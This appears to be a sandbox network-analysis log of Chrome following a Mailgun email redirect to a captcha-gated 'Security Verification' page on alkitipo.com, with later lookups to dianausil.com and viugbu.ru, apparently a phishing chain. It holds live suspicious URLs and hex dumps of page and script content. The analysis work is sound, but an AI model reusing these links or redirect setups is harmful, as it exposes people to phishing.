                                                                      Mar 19, 2025 11:29:53.823093891 CET1.1.1.1192.168.2.60xdb6No error (0)email.mg.dior.com.sgmailgun.orgCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:53.823093891 CET1.1.1.1192.168.2.60xdb6No error (0)mailgun.org34.102.239.211A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:54.198542118 CET1.1.1.1192.168.2.60xb082No error (0)a6b7c1be5ea686d6c0c05e957.alkitipo.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:29:54.210400105 CET1.1.1.1192.168.2.60xe60cNo error (0)a6b7c1be5ea686d6c0c05e957.alkitipo.com104.21.5.130A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:54.210400105 CET1.1.1.1192.168.2.60xe60cNo error (0)a6b7c1be5ea686d6c0c05e957.alkitipo.com172.67.133.120A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:54.366117954 CET1.1.1.1192.168.2.60x14ecNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:29:54.366854906 CET1.1.1.1192.168.2.60x5e05No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:54.366854906 CET1.1.1.1192.168.2.60x5e05No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:54.738102913 CET1.1.1.1192.168.2.60x5c3cNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:29:54.738781929 CET1.1.1.1192.168.2.60x4406No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:54.738781929 CET1.1.1.1192.168.2.60x4406No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:55.414633036 CET1.1.1.1192.168.2.60x80d8No error (0)a6b7c1be5ea686d6c0c05e957.alkitipo.com104.21.5.130A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:55.414633036 CET1.1.1.1192.168.2.60x80d8No error (0)a6b7c1be5ea686d6c0c05e957.alkitipo.com172.67.133.120A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:55.443334103 CET1.1.1.1192.168.2.60x36f6No error (0)a6b7c1be5ea686d6c0c05e957.alkitipo.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:29:55.510092020 CET1.1.1.1192.168.2.60x4e94No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:55.510092020 CET1.1.1.1192.168.2.60x4e94No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:55.511392117 CET1.1.1.1192.168.2.60x9c01No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:29:55.570271015 CET1.1.1.1192.168.2.60xbad8No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:04.174498081 CET1.1.1.1192.168.2.60x9dcbNo error (0)yg.dianausil.com172.67.214.184A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:04.174498081 CET1.1.1.1192.168.2.60x9dcbNo error (0)yg.dianausil.com104.21.23.248A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:04.180203915 CET1.1.1.1192.168.2.60xebceNo error (0)yg.dianausil.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.242183924 CET1.1.1.1192.168.2.60xa953No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.242183924 CET1.1.1.1192.168.2.60xa953No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.242183924 CET1.1.1.1192.168.2.60xa953No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.242183924 CET1.1.1.1192.168.2.60xa953No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.248233080 CET1.1.1.1192.168.2.60xea94No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.248233080 CET1.1.1.1192.168.2.60xea94No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.248373032 CET1.1.1.1192.168.2.60xcc7eNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.248373032 CET1.1.1.1192.168.2.60xcc7eNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.249027967 CET1.1.1.1192.168.2.60x1c7eNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.250441074 CET1.1.1.1192.168.2.60x7166No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.578696012 CET1.1.1.1192.168.2.60xdde4No error (0)developers.cloudflare.com104.16.6.189A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.578696012 CET1.1.1.1192.168.2.60xdde4No error (0)developers.cloudflare.com104.16.5.189A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.578696012 CET1.1.1.1192.168.2.60xdde4No error (0)developers.cloudflare.com104.16.3.189A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.578696012 CET1.1.1.1192.168.2.60xdde4No error (0)developers.cloudflare.com104.16.4.189A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.578696012 CET1.1.1.1192.168.2.60xdde4No error (0)developers.cloudflare.com104.16.2.189A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.582144022 CET1.1.1.1192.168.2.60x24ffNo error (0)developers.cloudflare.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.789786100 CET1.1.1.1192.168.2.60x393eNo error (0)developers.cloudflare.com104.16.2.189A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.789786100 CET1.1.1.1192.168.2.60x393eNo error (0)developers.cloudflare.com104.16.3.189A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.789786100 CET1.1.1.1192.168.2.60x393eNo error (0)developers.cloudflare.com104.16.5.189A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.789786100 CET1.1.1.1192.168.2.60x393eNo error (0)developers.cloudflare.com104.16.4.189A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.789786100 CET1.1.1.1192.168.2.60x393eNo error (0)developers.cloudflare.com104.16.6.189A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.834009886 CET1.1.1.1192.168.2.60x610aNo error (0)developers.cloudflare.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:15.580379009 CET1.1.1.1192.168.2.60x4397No error (0)luux.viugbu.ru172.67.148.100A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:15.580379009 CET1.1.1.1192.168.2.60x4397No error (0)luux.viugbu.ru104.21.95.206A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:15.581990957 CET1.1.1.1192.168.2.60x2feNo error (0)luux.viugbu.ru65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.407135010 CET1.1.1.1192.168.2.60x7ba9Name error (3)via.placeholder.comnonenone65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.408536911 CET1.1.1.1192.168.2.60xb709Name error (3)via.placeholder.comnonenoneA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.417221069 CET1.1.1.1192.168.2.60xd3d3Name error (3)via.placeholder.comnonenoneA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.441476107 CET1.1.1.1192.168.2.60x6d7eNo error (0)luux.viugbu.ru65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.477472067 CET1.1.1.1192.168.2.60x2c62Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.524507999 CET1.1.1.1192.168.2.60xbbe7No error (0)luux.viugbu.ru172.67.148.100A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.524507999 CET1.1.1.1192.168.2.60xbbe7No error (0)luux.viugbu.ru104.21.95.206A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.611005068 CET1.1.1.1192.168.2.60x3df9Name error (3)via.placeholder.comnonenoneA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.612037897 CET1.1.1.1192.168.2.60xa32cName error (3)via.placeholder.comnonenone65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:26.598298073 CET1.1.1.1192.168.2.60x496No error (0)yg.dianausil.com104.21.23.248A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:26.598298073 CET1.1.1.1192.168.2.60x496No error (0)yg.dianausil.com172.67.214.184A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:52.247137070 CET1.1.1.1192.168.2.60xaa2cNo error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                      • email.mg.dior.com.sg
                                                                      • a6b7c1be5ea686d6c0c05e957.alkitipo.com
                                                                        • challenges.cloudflare.com
                                                                        • yg.dianausil.com
                                                                          • code.jquery.com
                                                                          • cdnjs.cloudflare.com
                                                                          • developers.cloudflare.com
                                                                          • luux.viugbu.ru
                                                                      • a.nel.cloudflare.com
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.64970534.102.239.211801476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 19, 2025 11:30:38.832035065 CET6OUTData Raw: 00
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.64970634.102.239.211801476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 19, 2025 11:30:38.847090960 CET6OUTData Raw: 00
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.64970734.102.239.2114431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:54 UTC880OUTGET /c/eJwUy0uOhCAQANDTwJLUBwpdsJiN9ygK6CZq7Dhmzj_pA7xWBKxq8r1gjsS4AoF_l8iAiWysYzGVPNZsFoEqqg1tMPwsBJSAccHMgByi1kXYgKXnLpFchPMV2rzuYNcZfl_-KO_n-Tj-cbQ52lRqNqw9dZVFmhgYpL6mHPTY5zM_1xc62vxddBwuwn620Hb_V-g_AAD__9XhM88& HTTP/1.1
                                                                      Host: email.mg.dior.com.sg
                                                                      Connection: keep-alive
                                                                      Upgrade-Insecure-Requests: 1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: navigate
                                                                      Sec-Fetch-User: ?1
                                                                      Sec-Fetch-Dest: document
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:54 UTC335INHTTP/1.1 302 Found
                                                                      Access-Control-Allow-Credentials: true
                                                                      Access-Control-Allow-Origin: *
                                                                      Cache-Control: no-store
                                                                      Content-Length: 442
                                                                      Content-Type: text/html
                                                                      Date: Wed, 19 Mar 2025 10:29:54 GMT
                                                                      Location: http://a6b7c1be5ea686d6c0c05e957.alkitipo.com/
                                                                      X-Robots-Tag: noindex
                                                                      X-Xss-Protection: 1; mode=block
                                                                      Connection: close
                                                                      2025-03-19 10:29:54 UTC442INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 73 68 6f 75 6c 64 20 62 65 20 72 65
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta name="robots" content="noindex"><meta charset="utf-8"></head><body><title>Redirecting...</title><h1>Redirecting...</h1><p>You should be re


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.649708104.21.5.1304431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:54 UTC688OUTGET / HTTP/1.1
                                                                      Host: a6b7c1be5ea686d6c0c05e957.alkitipo.com
                                                                      Connection: keep-alive
                                                                      Upgrade-Insecure-Requests: 1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: navigate
                                                                      Sec-Fetch-User: ?1
                                                                      Sec-Fetch-Dest: document
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:54 UTC880INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:29:54 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-store
                                                                      X-Content-Type-Options: nosniff
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hoS7r9vEqzvDf2G8yLV5eyx5WwirW6Wlmq1Of%2BTOGRFJcaeaHD%2Fbn7olNxsAlS15lmcnJJbF%2FLjUxwLBby6BWVBS7WK9cFjlcXXkq7orgj27PQ4H4l7bjvd%2B8VpJZDx03d%2FEPhHzXkHVv7vo1BBstRdhgc8ulJh%2BMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Strict-Transport-Security: max-age=0
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4a9648889f21-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=491&min_rtt=481&rtt_var=188&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1260&delivery_rate=6020790&cwnd=234&unsent_bytes=0&cid=5aa52bd133932ac3&ts=70&x=0"
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 39 37 63 0d 0a 0a 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 53 65 63 75 72 69 74 79 20 56 65 72 69 66 69 63 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74
                                                                      Data Ascii: 97c <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Security Verification</title> <script src="https://challenges.cloudflare.com/t
                                                                      2025-03-19 10:29:54 UTC1066INData Raw: 74 63 68 61 43 6f 6d 70 6c 65 74 65 64 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 3f 63 66 5f 63 61 70 74 63 68 61 3d 76 65 72 69 66 69 65 64 22 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24
                                                                      Data Ascii: tchaCompleted() { window.location.href = "?cf_captcha=verified"; } </script> <script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$
                                                                      2025-03-19 10:29:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.649709104.18.94.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:54 UTC607OUTGET /turnstile/v0/api.js HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: script
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Referer: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:54 UTC386INHTTP/1.1 302 Found
                                                                      Date: Wed, 19 Mar 2025 10:29:54 GMT
                                                                      Content-Length: 0
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                      cross-origin-resource-policy: cross-origin
                                                                      location: /turnstile/v0/g/f3b948d8acb8/api.js
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4a976c758f3c-FRA
                                                                      alt-svc: h3=":443"; ma=86400


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.649710104.21.5.1304431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:54 UTC556OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                                      Host: a6b7c1be5ea686d6c0c05e957.alkitipo.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: script
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:54 UTC988INHTTP/1.1 302 Found
                                                                      Date: Wed, 19 Mar 2025 10:29:54 GMT
                                                                      Content-Length: 0
                                                                      Connection: close
                                                                      location: /cdn-cgi/challenge-platform/h/g/scripts/jsd/f3b948d8acb8/main.js?
                                                                      cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                      access-control-allow-origin: *
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C4hiUINCoGUeLMXIv%2Fyjys8cH4yeLLkCEftlKwjU7MdYHRwSZ3Sk6PNiCrTm5EiJsji6ubPHyb3n2jCjRqFhDEBF%2BljnTtdb1ZfdpQT%2FRxTj1zraFuNntbA%2BSSxMZOPnBrTsw3MGbL8%2BdXHgFD%2F5Kq7WK5uLAAhNBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Strict-Transport-Security: max-age=0
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4a98192ed35c-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=905&min_rtt=882&rtt_var=347&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=1128&delivery_rate=3283446&cwnd=241&unsent_bytes=0&cid=8c3043fd678df661&ts=67&x=0"


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.649711104.18.94.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:54 UTC622OUTGET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: script
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Referer: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:54 UTC471INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:29:54 GMT
                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                      Content-Length: 48239
                                                                      Connection: close
                                                                      accept-ranges: bytes
                                                                      last-modified: Fri, 28 Feb 2025 15:24:08 GMT
                                                                      cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                      access-control-allow-origin: *
                                                                      cross-origin-resource-policy: cross-origin
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4a982a7a30fa-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-03-19 10:29:54 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 76 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74
                                                                      Data Ascii: "use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 49 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75
                                                                      Data Ascii: e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 7a 74 28 65 29 7c 7c 42 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
